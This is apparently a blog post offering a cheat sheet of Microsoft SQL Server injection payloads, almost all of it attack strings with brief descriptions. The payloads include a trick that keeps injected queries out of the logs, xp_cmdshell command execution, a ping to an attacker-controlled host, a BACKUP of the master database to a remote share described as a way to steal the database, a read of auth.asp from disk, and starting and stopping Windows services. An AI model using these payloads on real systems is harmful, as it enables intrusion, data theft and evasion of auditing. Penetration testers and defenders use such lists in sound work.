» Microsoft SQL
| Payload | Description (if any) |
| 'admin –sp_password | sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged. |
| select @@version | View database version. |
| select @@servername | Misc. information disclosure |
| select @@microsoftversion | Misc. information disclosure |
| select * from master..sysservers | Misc. information disclosure |
| select * from sysusers | View database usernames and passwords. |
| exec master..xp_cmdshell 'ipconfig+/all' | Misc. command execution with cp_cmdshell. |
| exec master..xp_cmdshell 'net+view' | Misc. command execution with cp_cmdshell. |
| exec master..xp_cmdshell 'net+users' | Misc. command execution with cp_cmdshell. |
| exec master..xp_cmdshell 'ping+system-controlled-by-attacker' | Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed). |
| BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat' | Backup entire database to a file. This attack can be used to steal a database. |
| create table myfile (line varchar(8000))" bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’" select * from myfile"– | Reading files on the filesystem. |
| xp_servicecontrol (START or STOP) <service> | Start and stop Windows Services. |
| str1 + str2 OR n+n | Concat strings for blind SQL Injection tests. |
No Response to "Microsoft SQL"
Post a Comment